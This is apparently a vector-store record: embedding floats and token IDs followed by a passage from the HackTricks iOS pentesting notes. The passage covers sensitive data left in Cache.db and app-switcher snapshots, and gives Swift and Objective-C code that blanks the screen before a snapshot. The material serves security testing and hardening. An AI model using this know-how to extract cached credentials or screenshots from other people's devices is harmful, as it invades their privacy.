-0.4345959424972534, -0.014911741949617863, -0.4095766842365265, 0.014275924302637577, 0.06977999955415726, -0.12792204320430756, -0.328840047121048, 0.46764394640922546, 0.1610136330127716, -0.015608680434525013, -0.5782767534255981, 0.14841951429843903, -0.0666799396276474, -0.27602842450141907, 0.7912667393684387, -1.0291681289672852, -0.44118207693099976, -1.1490135192871094, -0.11129855364561081, 0.6242581009864807, 0.7027789354324341, 0.516310453414917, -0.4430050849914551, 0.45988842844963074, 0.6780370473861694, -0.05401087552309036, 1.2993309497833252, -0.17032651603221893, 0.22173146903514862, 0.8762454986572266, 0.3090890944004059, -0.3817742168903351, -0.1968121975660324, 0.0416349321603775, -0.2679619789123535, 0.2548252046108246, -0.485341876745224, -0.15279313921928406, -0.1913704127073288, 0.6274078488349915, -0.04555566981434822, 0.03738308325409889, -0.7743818759918213, -0.3635867238044739, -0.1567610800266266, 0.45165789127349854, -0.03337567299604416, -0.45481324195861816, 0.07710783928632736, -0.0767221748828888, -1.0649101734161377, -0.40757447481155396, 0.40191227197647095, 0.06924284994602203, 0.1862305998802185, -0.53548264503479, 0.45191699266433716, -0.5429911017417908, -0.05905832722783089, -0.3207465708255768, -0.057404857128858566, -0.2788136601448059, -0.1218491792678833, 0.4343184530735016, -0.36360323429107666, -0.27480626106262207, 0.0955352783203125, -0.1477491706609726, 0.2429647147655487, 0.03622714430093765, -0.20329268276691437, 0.4111672639846802, 0.4229273200035095, -0.19369123876094818, -0.31047362089157104, 0.46208620071411133, 0.23682254552841187, -0.368446946144104, -0.6874929070472717, -0.21108883619308472, -0.07092422246932983, 0.1885133683681488, 0.24064600467681885, 0.4308123290538788, -0.3438469469547272, 0.4329807758331299, -0.1177322268486023, -0.48841795325279236, -0.13398109376430511, -0.07744371891021729, -0.6908122897148132, 0.8039266467094421, -0.23935537040233612, 0.5161021947860718, 1.0601003170013428, 0.020832907408475876, 0.8307425379753113, -0.8004546165466309, 0.6031467318534851, 0.38909482955932617, -0.5455408096313477, -0.00036343204556033015, 0.4079477787017822, -0.031413476914167404, -0.5307074785232544, -0.04956859350204468, -0.24606823921203613, -0.1253374069929123, 0.725082516670227, -0.5278430581092834, 0.026744144037365913, -0.5546882748603821, 0.06843660026788712, -0.16128021478652954, 0.27104371786117554, 0.5122867226600647, -0.1980138123035431, 0.07364468276500702, 0.23809388279914856, -0.6282874941825867, 0.38852763175964355, -1.041006326675415, 0.0939415991306305, 0.6589126586914062, 0.05207400396466255, -0.1303894966840744, -1.0886906385421753, 0.39507538080215454, -0.03409658744931221, 0.5541678071022034, -0.4661719799041748, -0.4334201216697693, 0.11677911877632141, 0.1344292312860489, 0.8945043087005615, -0.47767743468284607, -0.49299854040145874, -0.3161408305168152, 0.1920686960220337, -1.385554552078247, -0.6882114410400391, 0.637361466884613, 0.9310218691825867, 0.44878602027893066, -0.595909059047699, -0.6926178336143494, 0.40639761090278625, 0.5408200621604919, -0.0251558106392622, 0.7851177453994751, -0.2066536247730255, 0.2737000584602356, 0.6494617462158203, -0.6416679620742798, 0.2241201251745224, -0.00021250612917356193, -0.29612886905670166, 0.6820476651191711, -0.41161754727363586, -0.39103561639785767, 0.2738620638847351, 0.2075939029455185, -0.4501371681690216, 0.8294612169265747, 0.6922953128814697, 0.19034041464328766, -0.645759642124176, 0.27836695313453674, -0.42308369278907776, 0.48015132546424866, 0.7378779649734497, -0.07728131115436554, -0.18481308221817017, 0.2781217694282532, 0.5065308809280396, -0.660365104675293, -0.013506966643035412, 0.5429759621620178, 0.5775448679924011, -0.5352635383605957, -0.03714805841445923, -0.3261731266975403, -0.09953673183917999, -0.03274046257138252, -0.14416968822479248, -0.09243207424879074, 0.014690021984279156, -0.006127458997070789, -0.04253217577934265, -0.27161166071891785, 0.6570033431053162, -0.7240961790084839, 0.973170816898346, -0.45261383056640625, -0.07457514107227325, 0.14566025137901306, -0.4057590663433075, -0.07644638419151306, 0.5708346962928772, 1.1131031513214111, 0.5297853946685791, 0.2634469270706177, 0.979163408279419, -0.11478292942047119, -0.03225009888410568, -0.23662614822387695, -0.5009939074516296, -0.3539279103279114, 0.12509185075759888, 0.13018685579299927, -0.9677128791809082, -0.14370620250701904, 0.26817086338996887, 0.09483148902654648, 0.3246144652366638, 0.46786579489707947, -0.08469653129577637, 0.04338952898979187, -0.5931043028831482, -0.07396221905946732, -0.15016700327396393, 0.14858941733837128, 0.31860417127609253, -0.3719531297683716, -0.5593706369400024, 0.9296298623085022, 0.1375330686569214, 0.9279425740242004, -0.8095551133155823, 1.0120856761932373, -0.1274053454399109, 0.08464746922254562, 0.2604975402355194, -0.6338083744049072, -0.3639676868915558, 0.20314036309719086, 0.017463169991970062, -0.590428352355957, -0.2634977400302887, -0.17088735103607178, -0.16069720685482025, 0.0021356302313506603, -0.20815226435661316, -0.47429704666137695, -0.13400384783744812, 0.22394663095474243, -0.7703502774238586, 0.8174980878829956, 0.050474148243665695, -0.6806182861328125, 0.2942648231983185, -0.30742841958999634, 0.17719049751758575, -0.11740000545978546, -0.3839181661605835, -0.3108014166355133, -0.038772836327552795, 0.04168727248907089, 0.08292151242494583, 0.6075235605239868, -0.09597256779670715, -0.4666233956813812, 0.0867990031838417, -0.5669738054275513, -1.067642092704773, -0.4273478090763092, -0.33896759152412415, 0.19225221872329712, 0.8670735955238342, 0.44496023654937744, 0.8534409999847412, 0.46453407406806946, -0.5356173515319824, -0.044913310557603836, 0.22611898183822632, 0.5307204723358154, -0.5199751853942871, 0.35011211037635803, 0.3815438449382782, 0.31852176785469055, 0.2727685272693634, -0.15254271030426025, 0.698588490486145, 0.08134714514017105, -0.7454785704612732, 0.035260025411844254, -0.2139868289232254, -0.7643107175827026, -0.4153186082839966, -0.01162327453494072, -0.08927489817142487, -0.4096027612686157, -0.08878041058778763, -0.7104796171188354, -0.32476648688316345, -0.5249928832054138, 0.6625151634216309, -0.20802684128284454, 0.5132954716682434, 0.30745065212249756, -0.23011675477027893, 0.5878564119338989, -0.9604840278625488, 4.387002944946289, 0.3319087326526642, 0.08943454176187515, -0.28519120812416077, 0.29185694456100464, 1.0167369842529297, 1.0394288301467896, -0.601524293422699, 0.37675216794013977, -0.6899763345718384, 0.5332083106040955, -0.04601297155022621, 0.5398926138877869, 0.11022741347551346, -0.06949232518672943, 0.20083525776863098, -0.5881666541099548, 0.33687108755111694, 0.17432992160320282, -1.0534076690673828, -0.1483849138021469, 0.042663611471652985, -0.21808607876300812, 1.0601086616516113, 0.22538666427135468, 0.28162214159965515, 0.4604249894618988, -0.9924294948577881, -0.4042733907699585, -0.17378352582454681, -0.013956472277641296, -0.584682047367096, -0.24159707129001617, -0.23561641573905945, -0.47646063566207886, 0.20607860386371613, 0.10397952795028687, -1.2735787630081177, -0.43936342000961304, -0.07892627269029617, 0.301974356174469, -0.20952914655208588, -0.29843807220458984, -0.5972903966903687, 0.39984285831451416, 0.8191652894020081, -0.39089518785476685, 0.9976226687431335, 0.6709975004196167, -0.6874571442604065, 0.5203320980072021, -0.38616302609443665, 0.11621495336294174, -0.25957223773002625, -0.9529326558113098, 0.05408720299601555, 0.6365782618522644, -0.07593154907226562, 0.5819687247276306, -0.07452613115310669, 0.6155830025672913, -0.5286270976066589, -0.22365382313728333, 0.044818777590990067, -0.7474870681762695, 0.2533537447452545, -0.6826775670051575, 0.2614545226097107, -0.35231542587280273, 0.08702915906906128, -0.3825039863586426, 0.035777296870946884, -0.5646920204162598, -0.17651154100894928, 0.8742627501487732, -0.3147526681423187, -0.38229045271873474, 0.19622045755386353, -0.030547279864549637, -0.7491286396980286, -0.20559373497962952, -0.9379699230194092, -0.9160720109939575, 0.4731089472770691, 0.23137769103050232, 0.6097677946090698, -0.1302747279405594, -0.41660985350608826, 0.07266142964363098, 0.6232820153236389, 0.12479190528392792, 0.4535577893257141, -0.5581073760986328, 0.5054298043251038, 0.32496339082717896 ]
[ 2122, 6764, 2000, 1037, 1046, 3385, 4289, 1998, 22459, 1996, 2951, 1012, 1012, 1012, 1012, 2009, 12672, 3270, 10603, 1012, 1040, 9035, 26760, 10128, 9189, 2475, 1012, 4503, 2006, 1006, 18059, 1024, 2410, 1012, 1016, 1012, 1017, 1007, 1031, 18833, 1033, 1001, 16380, 16324, 2131, 1011, 1011, 1046, 3385, 1031, 1063, 1000, 5884, 1000, 1024, 1000, 2152, 2389, 3775, 8525, 25383, 8684, 2015, 1012, 4012, 1000, 1010, 1000, 4654, 20781, 16150, 3686, 1000, 1024, 1000, 16327, 2487, 1011, 5641, 1011, 2321, 5718, 1024, 4805, 1024, 4724, 1009, 2199, 2692, 1000, 1010, 1000, 2003, 11039, 25856, 2239, 2135, 1000, 1024, 1000, 6270, 1000, 1010, 1000, 26354, 29150, 1000, 1024, 1000, 6270, 1000, 1010, 1000, 2171, 1000, 1024, 1000, 5310, 18442, 1000, 1010, 1000, 4130, 1000, 1024, 1000, 1013, 1000, 1010, 1000, 3643, 1000, 1024, 1000, 4748, 10020, 12521, 2509, 1000, 1010, 1000, 2544, 1000, 1024, 1000, 1014, 1000, 1065, 1033, 17053, 3762, 12398, 24978, 3126, 4877, 7971, 3258, 5324, 2951, 1010, 2107, 2004, 8299, 11186, 1998, 10960, 1999, 1996, 17053, 1012, 16962, 7809, 1012, 2023, 7809, 2064, 5383, 7591, 2951, 1010, 2065, 19204, 2015, 1010, 5310, 18442, 2015, 2030, 2151, 2060, 7591, 2592, 2038, 2042, 17053, 2094, 1012, 2000, 2424, 1996, 17053, 2094, 2592, 2330, 1996, 2951, 14176, 1997, 1996, 10439, 1006, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1026, 1057, 21272, 1028, 1007, 1998, 2175, 2000, 1013, 3075, 1013, 17053, 2015, 1013, 1026, 14012, 8909, 4765, 18095, 1028, 1012, 1996, 4773, 23615, 17053, 2003, 2036, 2108, 8250, 1999, 1996, 17053, 1012, 16962, 5371, 1012, 22224, 2064, 2330, 1998, 11835, 2007, 1996, 7809, 2007, 1996, 3094, 29296, 4221, 7532, 17053, 1012, 16962, 1010, 2004, 2009, 2003, 1037, 3671, 29296, 4221, 7809, 1012, 2009, 2003, 6749, 2000, 4487, 19150, 6187, 8450, 2023, 2951, 1010, 2004, 2009, 2089, 5383, 7591, 2592, 1999, 1996, 5227, 2030, 3433, 1012, 1996, 2206, 2862, 2917, 3065, 2367, 3971, 1997, 10910, 2023, 1024, 1015, 1012, 2009, 2003, 6749, 2000, 6366, 17053, 2094, 10960, 2044, 8154, 4904, 1012, 2023, 2064, 2022, 2589, 2007, 1996, 3024, 4118, 2011, 6207, 2170, 6366, 8095, 3540, 7690, 6072, 26029, 8583, 2017, 2064, 2655, 2023, 4118, 2004, 4076, 1024, 24471, 15472, 15395, 1012, 4207, 1012, 6366, 8095, 3540, 7690, 6072, 26029, 8583, 1006, 1007, 2023, 4118, 2097, 6366, 2035, 17053, 2094, 11186, 1998, 10960, 2013, 17053, 1012, 16962, 5371, 1012, 1016, 1012, 2065, 2017, 2123, 1005, 1056, 2342, 2000, 2224, 1996, 5056, 1997, 16324, 2009, 2052, 2022, 6749, 2000, 2074, 2224, 1996, 1012, 4958, 29122, 21673, 9563, 3200, 1997, 24471, 4877, 7971, 3258, 1010, 2029, 2097, 4487, 19150, 7494, 16324, 1998, 17053, 2015, 1012, 6207, 12653, 1024, 2019, 4958, 29122, 21673, 5219, 9563, 4874, 2003, 2714, 2000, 1037, 12398, 5219, 9563, 1006, 2156, 12398, 1007, 1010, 3272, 2008, 1996, 7978, 5219, 4874, 2987, 1521, 1056, 3573, 17053, 2015, 1010, 13675, 14728, 19909, 5324, 1010, 2030, 2151, 5219, 1011, 3141, 2951, 2000, 9785, 1012, 2612, 1010, 5219, 1011, 3141, 2951, 2003, 8250, 1999, 8223, 1012, 1996, 2069, 2051, 2019, 4958, 29122, 21673, 5219, 7009, 2951, 2000, 9785, 2003, 2043, 2017, 2425, 2009, 2000 ]
hack_tricks
43.txt
11
write the contents of a url to a file. 3. cache can be also disabled by setting the cache policy to. notallowed. it will disable storing cache in any fashion, either in memory or on disk. snapshotswhenever you press the home button, ios takes a snapshot of the current screen to be able to do the transition to the application on a much smoother way. however, if sensitive data is present in the current screen, it will be saved in the image ( which persists across reboots ). these are the snapshots that you can also access double tapping the home screen to switch between apps. unless the iphone is jailbroken, the attacker needs to have access to the device unblocked to see these screenshots. by default the last snapshot is stored in the application's sandbox in library / caches / snapshots / or library / splashboard / snapshots folder ( the trusted computers can't access the filesystem from iox 7. 0 ). once way to prevent this bad behaviour is to put a blank screen or remove the sensitive data before taking the snapshot using the applicationdidenterbackground ( ) function. the following is a sample remediation method that will set a default screenshot. swift : private var backgroundimage : uiimageview? func applicationdidenterbackground ( _ application : uiapplication ) { let mybanner = uiimageview ( image : # imageliteral ( resourcename : " overlayimage " ) ) mybanner. frame = uiscreen. main. bounds backgroundimage = mybanner window?. addsubview ( mybanner ) } func applicationwillenterforeground ( _ application : uiapplication ) { backgroundimage?. removefromsuperview ( ) } objective - c : @ property ( uiimageview * ) backgroundimage ; - ( void ) applicationdidenterbackground : ( uiapplication * ) application { uiimageview * mybanner = [ [ uiimageview alloc ] initwithimage : @ " overlayimage. png " ] ; self. backgroundimage = mybanner ; self. backgroundimage. bounds = uiscreen. mainscreen. bounds ; [ self. window addsubview : mybanner ] ; } - ( void ) applicationwillenterfor
[ -0.1090555489063263, -0.20759570598602295, -0.07057071477174759, 0.7679151296615601, -0.1319241225719452, -0.12836682796478271, -0.8103139400482178, -0.28314703702926636, 0.8434197306632996, 0.8729119300842285, -0.12322073429822922, -0.42350345849990845, 0.650573194026947, 0.05869920924305916, -0.7431188225746155, -0.4346260130405426, -0.5858124494552612, 0.23463477194309235, -0.611236572265625, 0.02415812760591507, 0.2541385889053345, 0.2659973204135895, -0.8799231648445129, -1.0814929008483887, -0.13470333814620972, 0.742749810218811, 0.21739311516284943, 0.33200839161872864, 0.3529163897037506, 0.7539170980453491, -0.08712619543075562, 0.07613159716129303, -0.4468151926994324, -0.27822017669677734, 0.19788047671318054, 0.05164099857211113, 0.668494701385498, -0.19652409851551056, -0.07659091055393219, -0.5756716132164001, 0.6966046094894409, -0.3080652356147766, 0.10182136297225952, -0.3153729736804962, -0.22706466913223267, -0.4270741045475006, 0.5317214727401733, 0.1515059620141983, 0.34383004903793335, 0.04012363404035568, 0.25654760003089905, 0.3443685472011566, 0.08628949522972107, -0.0599839873611927, 0.29604479670524597, 0.01628275029361248, -0.2918681502342224, -0.0013085410464555025, -0.3690611720085144, 0.39016011357307434, 0.2633565366268158, 0.04401087388396263, 0.16338448226451874, -0.4027731716632843, -0.06833014637231827, 0.6674593687057495, -0.043921176344156265, 0.1003565639257431, -0.2253042459487915, -0.057456210255622864, -0.5879497528076172, 0.48940524458885193, -0.622509241104126, -0.3352329432964325, -0.16658498346805573, 0.49513038992881775, -0.533232569694519, -0.1662842333316803, 0.1969238966703415, 0.22363243997097015, -0.19911280274391174, 0.4799015522003174, 0.18229778110980988, -0.4270188510417938, -0.6704646348953247, -0.240289106965065, 0.7031063437461853, 0.4536171555519104, -0.6974475979804993, 0.4950520098209381, -0.16782192885875702, 0.5208801031112671, -0.301332026720047, -0.43604856729507446, 0.0747327134013176, 0.5847340226173401, 0.25168806314468384, 0.1275605857372284, 0.339400976896286, -0.3494822084903717, 0.25491654872894287, 0.9675506949424744, -0.055197399109601974, 0.9965900182723999, -0.10367916524410248, 0.2854176163673401, 0.2744000554084778, -0.3328585624694824, -0.2952736020088196, -0.38822221755981445, 0.3217052221298218, -0.2223888784646988, 0.18971942365169525, -0.5069392919540405, -0.15598227083683014, 0.046129412949085236, 0.06440235674381256, 0.18351753056049347, -0.13013502955436707, 0.6477936506271362, 0.14527645707130432, -0.3451724350452423, 0.22690200805664062, -0.3924160897731781, 0.10185741633176804, -0.38685837388038635, 0.38006067276000977, 0.8210772275924683, -0.5116671323776245, -0.4558538496494293, -0.2715981900691986, -0.010239574126899242, 0.19429029524326324, 1.0355253219604492, -0.5868121981620789, 0.3073980510234833, 0.27662986516952515, 0.17218774557113647, 0.6121859550476074, -0.6306059956550598, -0.03162088617682457, -0.11510547250509262, -0.10004983842372894, 0.6996451616287231, 0.15478160977363586, 0.11091504245996475, -0.3206562399864197, 0.022490153089165688, -0.7741649746894836, 0.15419848263263702, -0.1181771531701088, 0.5987897515296936, 0.5462630391120911, 0.003951702732592821, -0.35981544852256775, 0.05068870261311531, -0.08294112980365753, 0.2369307577610016, -0.40223386883735657, -0.30899062752723694, 0.15333464741706848, 0.4666501581668854, -0.14594657719135284, 0.3848254382610321, -0.5476368069648743, 0.6524494290351868, -0.8193191885948181, -0.3879179358482361, -0.3737320005893707, 0.2945402264595032, 0.3892661929130554, 0.1012575775384903, -0.12452396750450134, 0.11710016429424286, 0.6604960560798645, 0.5257747769355774, -0.08227712661027908, -0.48428601026535034, 0.28062760829925537, 0.49366533756256104, -0.05404920503497124, -0.0882423147559166, 0.6294492483139038, 0.3345606327056885, -0.3654431998729706, 0.11790918558835983, -0.8073343634605408, -0.9026568531990051, -0.0857248455286026, -0.4278710186481476, -0.3129294812679291, 0.46340322494506836, -0.24395081400871277, 0.3284648358821869, 0.4859052896499634, -0.2038910686969757, -1.1843618154525757, -0.5541889071464539, -0.07599209994077682, -1.258729338645935, -0.4431575834751129, -0.4738254249095917, -0.07183460146188736, 0.18854835629463196, 0.35596963763237, 0.19775600731372833, 0.8774187564849854, 0.7413431406021118, -0.1385187953710556, 0.5021792054176331, 0.4786895513534546, -0.21926091611385345, -0.5335072875022888, -0.22535079717636108, 0.5021646022796631, -0.29906725883483887, -0.27429383993148804, 0.38146451115608215, -0.655028223991394, 0.090046226978302, -0.2283191978931427, 0.7741473913192749, 0.7410297393798828, -0.021877368912100792, 0.056324198842048645, -0.023051995784044266, 0.322616308927536, 0.5128921866416931, -0.10237424075603485, 0.15633806586265564, -0.11223116517066956, 0.5342901349067688, 0.011556646786630154, 0.6888782382011414, 0.032762229442596436, 0.16318924725055695, -0.06028908118605614, -0.3304266929626465, 0.11897362023591995, 0.14227734506130219, -0.01516198180615902, 0.4831351935863495, 0.8570566177368164, -0.11660666018724442, 0.4276159107685089, 0.3334275484085083, -0.22483104467391968, 0.0044815391302108765, -0.3535385727882385, 0.5379692316055298, -0.14762362837791443, 0.38493770360946655, 0.4300347566604614, 0.029615115374326706, -0.3209570348262787, -0.238477885723114, 0.4967091977596283, 0.7648182511329651, -0.2504756450653076, -0.6099085211753845, -0.45124438405036926, -0.10276792198419571, 0.033890094608068466, -0.1978398710489273, 0.0735875740647316, 0.8659957051277161, -0.29280224442481995, 0.36510273814201355, 0.08109728246927261, -0.653460681438446, -0.9366005659103394, -0.4610552191734314, -0.8710615634918213, -0.5054084062576294, -0.6084620356559753, -0.12078177183866501, 0.2550959885120392, -0.43675222992897034, 0.6628401875495911, -0.2708791494369507, -0.7478094696998596, 0.12914134562015533, 0.25246256589889526, 0.056268904358148575, -0.11967925727367401, 0.10630850493907928, -0.5751867890357971, 0.1831810474395752, 0.4409900903701782, 0.5156203508377075, -0.3193473219871521, -0.37159663438796997, -0.2920479476451874, 0.04891069605946541, -0.018380185589194298, -0.25526300072669983, 0.8897228240966797, 0.5485634803771973, -0.05758676677942276, -0.25207316875457764, 0.35405123233795166, -0.042180221527814865, 0.1866544783115387, -0.2999293804168701, -0.3667689859867096, 0.49657315015792847, -0.13175071775913239, 0.1906386911869049, 0.1651625633239746, 0.902462899684906, -0.4299893081188202, 0.41136792302131653, 0.4101446568965912, 0.3454851806163788, -0.2792738378047943, 0.5933741927146912, 0.5196098685264587, 0.24493807554244995, -0.2488604187965393, 0.2987399399280548, 0.09024646878242493, -0.4380455017089844, -0.2984411418437958, -0.636299192905426, -0.20326927304267883, -0.018651295453310013, -0.4504770040512085, -1.1115046739578247, 0.29562827944755554, -0.639068603515625, -0.5092171430587769, -0.4208712875843048, -0.19322921335697174, 0.6850630640983582, 0.6899269223213196, 0.16027851402759552, 0.29043251276016235, 0.07370664179325104, 0.47507408261299133, 0.323079913854599, 0.2013266533613205, -0.6937173008918762, 0.7686089277267456, 0.20184867084026337, -0.1489863097667694, 0.7327011823654175, 0.3953728973865509, -0.14818516373634338, -0.41575294733047485, -0.18514177203178406, -0.01515041571110487, -0.10255976766347885, 0.09399227052927017, -0.03634141758084297, 0.38860443234443665, 0.37105923891067505, -0.7080267667770386, 0.19748839735984802, 0.134215846657753, 0.22342875599861145, 0.6416885852813721, 0.19866514205932617, 0.024648822844028473, 0.23563961684703827, -0.2707003355026245, -0.5293844938278198, 0.2831695079803467, 0.20660445094108582, 0.18202318251132965, -0.5452142953872681, 0.44912293553352356, -0.25324276089668274, 0.16729149222373962, 0.15440121293067932, -0.23967741429805756, -0.5637212991714478, 0.728581964969635, -0.030116865411400795, 0.1039576306939125, -0.7369098663330078, 0.22071020305156708, -0.08706938475370407, 0.47126346826553345, 0.7605205178260803, 0.16433067619800568, 0.14046666026115417, 0.18796075880527496, 0.06898122280836105, -0.02524918131530285, -0.7186614871025085, 0.3267647624015808, -0.37686046957969666, 0.061287932097911835, -0.2809169888496399, -0.9845585227012634, -0.7054601311683655, 0.5137270092964172, 0.5472331047058105, 0.6768047213554382, 0.12825718522071838, 0.3526262938976288, 0.2568660080432892, 0.5278642773628235, 0.2697550058364868, -0.49130043387413025, -0.12284352630376816, -0.4579654932022095, 0.8251535892486572, -0.08707758784294128, 0.4796784222126007, -0.33049261569976807, -0.024047203361988068, -0.2894551157951355, -0.20864200592041016, 0.154061421751976, 0.2225494086742401, -0.5902915000915527, -0.390908420085907, 0.06832074373960495, 0.314746230840683, -0.5907203555107117, -0.6253604292869568, -0.3682733476161957, 0.7007431387901306, 0.3198903799057007, -0.7419657111167908, -0.18457558751106262, -0.7297716736793518, 0.23638911545276642, 0.27833813428878784, 0.2442745417356491, -0.2805847227573395, -0.4223095178604126, -0.5876405835151672, -0.6034784317016602, 0.37149667739868164, 0.16841714084148407, -0.20746196806430817, -0.328325092792511, -1.0738985538482666, -0.48770853877067566, 0.3866429328918457, -0.352591335773468, -0.6430339813232422, 0.22164694964885712, 0.19239000976085663, 0.5632777214050293, 0.33901941776275635, -0.6624475121498108, 0.10454624146223068, 0.17630741000175476, -0.5473467707633972, 0.960558295249939, -0.5276641845703125, 0.0000670164663461037, 0.20363235473632812, 0.13146597146987915, -0.15344277024269104, 0.4313598573207855, -0.43101513385772705, -0.3672265112400055, -0.19447605311870575, -0.10819726437330246, 0.13223601877689362, -0.29324573278427124, 0.6126731038093567, -0.5557577610015869, 0.17314709722995758, 0.23124614357948303, 0.3227481245994568, -0.04264986142516136, 0.4735148847103119, -0.09992454200983047, -1.0077859163284302, 0.14387504756450653, -0.6123720407485962, 0.8533217906951904, -0.2618428170681, -0.08236227929592133, 0.03219861909747124, -0.13924288749694824, 1.0019057989120483, -0.2944355905056, -0.1553732305765152, -0.6259362697601318, -0.40774887800216675, 0.02991413325071335, 0.23047849535942078, 0.1712353676557541, 0.08552860468626022, 0.05379454791545868, -0.3338533937931061, -0.2181377410888672, 0.029361749067902565, -0.6066743731498718, -0.3131052255630493, -0.39405402541160583, -0.15656103193759918, 0.49974167346954346, -0.45126602053642273, 0.31517040729522705, -0.39584723114967346, -0.8158371448516846, 0.1861681193113327, -0.007326567079871893, 0.32849812507629395, -0.9590751528739929, -0.48644039034843445, -0.3724052906036377, 0.2441360056400299, -0.6363835334777832, 0.11515168845653534, -0.39368754625320435, 0.32192641496658325, 0.8240362405776978, 0.5454241633415222, 0.01897745579481125, -0.5007034540176392, -0.021566826850175858, 0.3841627836227417, 0.16948895156383514, -0.13866034150123596, 0.181165874004364, 0.5718912482261658, -0.3316279649734497, -0.3108897805213928, -0.24946260452270508, -0.4162513017654419, -0.8703033924102783, -0.5472541451454163, -0.23623596131801605, -0.7681375741958618, 0.4004904329776764, -0.2152397632598877, -0.40367797017097473, -0.012776152230799198, 0.6654572486877441, -0.12885256111621857, -0.32716673612594604, 0.1940375119447708, -0.281894326210022, -0.10977530479431152, -0.21129117906093597, -0.10637225210666656, -0.3921860158443451, -0.5895371437072754, 0.035310130566358566, 0.2823643386363983, -0.126753032207489, 0.4032747149467468, 0.2028752863407135, 0.3710658550262451, 0.573336660861969, -0.10137486457824707, -0.5687901377677917, -0.49366551637649536, -0.0693792924284935, 0.3012654483318329, -0.46494805812835693, -0.03892960026860237, -0.7994728684425354, 0.3099534511566162, -0.06016300991177559, -0.16054674983024597, 0.380485862493515, 0.046395812183618546, 0.12984059751033783, 0.17096853256225586, 0.39954277873039246, -0.5761386156082153, 0.1718045175075531, -0.5326442718505859, 0.7043191194534302, -0.009136885404586792, -0.24110765755176544, -0.4155198335647583, -0.43369075655937195, -0.1226227879524231, -1.0674148797988892, 0.670367956161499, -0.43301936984062195, -0.21468353271484375, 0.10550233721733093, -0.28634992241859436, 0.7497842907905579, -0.39452189207077026, 0.3490339517593384, 0.9615010023117065, 0.5471856594085693, 0.17776353657245636, -0.37410295009613037, 0.06162792816758156, 0.3959461748600006, -0.21111223101615906, -0.3822901248931885, -0.2031961977481842, -0.5497838854789734, -0.4375283420085907, -0.4618689715862274, -0.23703834414482117, -0.6277201175689697, 0.07720677554607391, 0.37605032324790955, -0.19950303435325623, 0.3777119815349579, 0.017286716029047966, -0.13539856672286987, -0.4037628173828125, -0.16431882977485657, 0.16774094104766846, -0.12571987509727478, 0.3654044568538666, 0.2929341197013855, -0.29008862376213074, -0.3831150531768799, 0.42459964752197266, -0.3665516972541809, -0.05703223496675491, 0.5087826251983643, -0.10121629387140274, -0.6747682690620422, 0.8312451839447021, 0.20163878798484802, -1.3073326349258423, -0.4087902009487152, -0.37683993577957153, -0.43280228972435, 0.7204769253730774, -0.467237651348114, -0.08768574148416519, 0.03239811584353447, -0.20638413727283478, -0.48491841554641724, 0.31916525959968567, 0.41589340567588806, -0.23807208240032196, -0.395398885011673, 0.07585548609495163, -0.32193562388420105, -0.09144198149442673, 0.2838788330554962, -0.5666137337684631, 0.047867633402347565, -0.893785834312439, -0.33526554703712463, 0.2747392952442169, 0.04896365478634834, 1.1566535234451294, -0.9539275169372559, 0.19875392317771912, -0.47084343433380127, 0.05573999881744385, 0.7039247155189514, 0.293348103761673, 0.005942466668784618, 0.936604917049408, 0.44488662481307983, -0.6811798810958862, -0.4352948069572449, 0.43856725096702576, 0.1051793023943901, -0.1344154328107834, -0.5655246376991272, 0.1360217183828354, 0.15844999253749847, 0.031018609181046486, -0.06079497188329697, -0.34728923439979553, -0.8144054412841797, -0.8284721374511719, 0.25557252764701843, -0.04187316820025444, -0.22507193684577942, -0.3815217614173889, -0.03395352140069008, -0.018273377791047096, -0.23446819186210632, -0.2284267693758011, 0.5602885484695435, -0.006599105894565582, 0.6225658655166626, -0.46365591883659363, 0.48472678661346436, -0.7012649178504944, -0.5156057476997375, -0.2975459694862366, -0.30318328738212585, -0.300485223531723, -0.1308702826499939, -0.08766569197177887, -0.17943015694618225, -0.7632136344909668, 0.44879665970802307, -0.3860780894756317, 0.4074285924434662, -0.059714049100875854, -0.2363404929637909, -0.11010180413722992, 0.5913761258125305, -0.2941546142101288, -0.23685327172279358, 0.7188936471939087, -0.1873982697725296, -0.36766064167022705, -0.4932326376438141, -0.14794212579727173, -0.3929119408130646, 0.5861018896102905, 0.5492249131202698, 0.0955493152141571, -0.16766025125980377, 0.24239568412303925, -0.11742004752159119, -0.41416189074516296, -0.24273842573165894, -0.45402297377586365, -0.041876476258039474, 0.1164553090929985, 0.17183436453342438, 0.24014565348625183, 0.5181530117988586, 0.228932186961174, 1.0193184614181519, -0.5709010362625122, 0.46642637252807617, 0.15563151240348816, -0.2671576738357544, -0.3952852785587311, 0.2913776934146881, 0.2250787317752838, -0.36938175559043884, 0.0619216188788414, 0.24188289046287537, -0.5987634658813477, 0.2634681165218353, -0.12111746519804001, 0.038784343749284744, -0.2160157710313797, 0.1470320075750351, 0.11403258144855499, 0.23985795676708221, 0.3948557674884796, 0.19700898230075836, 0.25838860869407654, -0.1648802012205124, -0.7676613926887512, 0.1929943561553955, -0.5065783262252808, -0.059264279901981354, -0.25274592638015747, -0.026349999010562897, -0.011195098981261253, -0.43403783440589905, 0.042179953306913376, 0.21373383700847626, 0.391040563583374, -0.3256209194660187, 0.3071908950805664, -0.24301186203956604, -0.0591755211353302, 1.3278917074203491, 0.06702852994203568, -0.21572591364383698, -0.15964102745056152, 0.23538632690906525, -0.6308099031448364, -0.8319474458694458, 0.13529258966445923, 0.9052194356918335, -0.19292794167995453, -0.6700589656829834, -0.6358481049537659, -0.1530531495809555, 0.43783047795295715, -0.12952743470668793, 0.6588166952133179, 0.2906827926635742, -0.3833083212375641, 0.36262598633766174, -0.629629909992218, 0.15145930647850037, 0.020025121048092842, -0.025579094886779785, 0.4739348292350769, -0.7227925658226013, -0.5915151834487915, 0.16780602931976318, 0.26336008310317993, -0.5472666621208191, 0.7110944986343384, 0.23008137941360474, 0.27632173895835876, -0.4312635660171509, 0.00929607730358839, -0.519611120223999, 0.3794407248497009, 0.519734263420105, 0.21404781937599182, -0.2678084671497345, -0.18752628564834595, 0.4155600070953369, -0.3988736867904663, 0.29296568036079407, 0.31447625160217285, 0.19215744733810425, -0.12465090304613113, 0.14758560061454773, -0.34100472927093506, -0.480866402387619, -0.26781874895095825, -0.1817617565393448, 0.24210256338119507, 0.07111642509698868, 0.16137178242206573, -0.19866105914115906, -0.43947625160217285, 0.5385320782661438, -0.439795583486557, 0.46687620878219604, 0.37793344259262085, -0.14011581242084503, -0.35786333680152893, 0.0651424452662468, -0.5193043947219849, 0.6643447279930115, 0.4227634370326996, 0.06731318682432175, 0.01528142485767603, 0.5138713121414185, 0.0037829314824193716, 